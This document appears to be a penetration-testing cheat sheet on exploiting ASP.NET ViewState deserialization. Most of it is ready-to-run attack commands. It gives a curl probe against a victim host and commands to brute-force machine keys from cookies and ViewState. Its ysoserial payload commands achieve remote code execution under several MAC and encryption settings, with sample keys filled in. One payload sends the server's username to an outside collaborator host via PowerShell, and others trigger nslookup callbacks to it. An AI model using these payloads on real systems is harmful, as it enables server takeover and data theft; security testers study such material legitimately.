View State
View State¶
View State:
Used in the ASP.net framework. This hidden input field is the state of the page and its controls. Can contain serialized data
Event Validation:
Checks incoming data to validate possible values and return errors when invalid data is submitted.
Serialization Formats:
- ObjectStateFormatter: Default Deserializer
- LOSFormatter: Default Serializer
- BinaryFormatter:
Common Parameters and Cookies:
- __PREVIOUSPAGE
- __VIEWSTATE
- .aspxauth
- asp.net.applicationcookie
- __VIWESTATEGENERATOR
MAC Enabled¶
Note
By Default the MAC is disabled before 4.0
Types of MACs:
- SHA1
- AES
- MD5
- HMACSHA256
- HMACSHA384
- HMACSHA512
Blackbox Testing¶
Check if error returned with the following command
curl https://victim.com/path/page.aspx?__VIEWSTATE=AAAA
Leaking the Validation Key¶
Can be found in the web.config file under the machineKey tag. Otherwise it must be leaked with a Information Disclosure vulnerability.
Test Common Validation Keys:
#Take data from
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie
Encrypted¶
Note
By Default the MAC is disabled before 4.5
Types of Encryption:
- AES (Default)
- 3DES
- DES
Black Box Testing¶
Remove the __VIEWSTATEENCRYPTED parameter from the request and test the deserialization. If it returns a Viewstate MAC validation error then it confirms that a MAC is enabled
Leaking the Encryption Key¶
Usually found in the web.config or machine.config files
AES256Decryptor
Test Common AES Encryption Keys:
#Take data from the data from __VIEWSTATE, parameter
python decrypter.py --data "DACE7CF24FF4901DF59CAAACDA1EBDEA" --format hex
python decrypter.py --data "2s588k/0kB31nKqs2h696g==" --format base64
Test Common Encryption Keys against the ViewState:
#Take data from the data from __VIEWSTATE
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata Ve3mZjZwbMRyGTts1EV0F7Hp4eAx11qmXi45oAE7/bDDmA55+Kf9+WWACzUQtly4pRQYkMgmZJnJIDCQQhLNCWaHKbgY7dOiHn8JE7Yx19xvVhYyoqnC8ITLvHiiuJl8+LFmPJwS7ip3vAe+o7mxg2H15VUW5LO56AiTErT7UUw4Au002vflZUF6h/Fx/TJAYciUlZ8CmNW9/GIoPAC9tQ4SVhGD7is8Gu8DiUJE0AjHTLQFcy9vgSk1ovpy4gn9gl98mNVk17uCI7LLYPkvO3Xuix2WTogyqaPQOn7gJz7Say/aqqhmW90LdGo0qeldEUvMGw== --decrypt --purpose=viewstate --IISDirPath "/" --TargetPagePath "/Content/default.aspx"
Test Common Encryption Keys against the asp.net.applicationcookie:
#Take data from the data from asp.net.applicationcookie
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie
Test Common Encryption Keys against the .aspxauth cookie:
#Take data from the data from __VIEWSTATE
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata CA387A93AD4214F356ED05C26C1E4D80F0804CD526766778B62D4F9213B87B5369755F95008A34644B9CA6B7646E191958A1AE14DB398AB943D3DB042EDA06EC4B5BEA9E3EB60E9877646AD4A50BE9435A2D3B4B3005836CBBBDA64A5E8738511211AA1F --decrypt --purpose=aspxauth
Payloads¶
Test Exploit with MAC Disabled:
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "nslookup test.burpcollaborator.net" > payload_when_mac_disabled
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://test.burpcollaborator.net/$env:UserName" > payload_when_mac_disabled
#Set output as POST Parameter __VIEWSTATE=$output
Exploit with MAC Enabled:
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --islegacy --isdebug --validationalg="SHA1" --validationkey="011165C2E613D02353C3C59EBECAE15F2EB8D4075D05B04CCD9075F26B80503CFE44C7099E3B97EDD4537B8F98D274784FABF5EBCAB255F861B2CEAE82750EB0" --apppath="/" --path="Hello.aspx" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output
Exploit with MAC and Encryption Enabled:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup test.burpcollaborator.net" --generator=93D20A1B --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output
Exploit with MAC and Encryption Enabled:
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output
Exploit with MAC and Encryption Enabled with ViewStateUserKey used:
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" --viewstateuserkey="randomstringdefinedintheserver" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output
Tools:
- https://github.com/0xACB/viewgen
- https://github.com/Illuminopi/RCEvil.NET